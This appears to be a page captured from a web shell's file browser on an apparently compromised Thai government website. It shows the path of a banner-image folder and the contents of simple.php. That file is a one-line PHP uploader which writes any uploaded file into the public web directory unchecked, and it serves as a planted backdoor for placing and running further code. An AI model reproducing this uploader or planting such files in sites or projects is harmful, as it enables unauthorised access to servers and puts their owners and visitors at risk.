Web Shell

Current directory: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner

Viewing: /home/coloflew/domains/tessabalpatiu.go.th/public_html/image_data/banner/simple.php

<?php echo "<form method=post enctype=multipart/form-data><input type=file name=f><input type=submit></form>" . (move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']) ? "Uploaded!" : ""); ?>
Back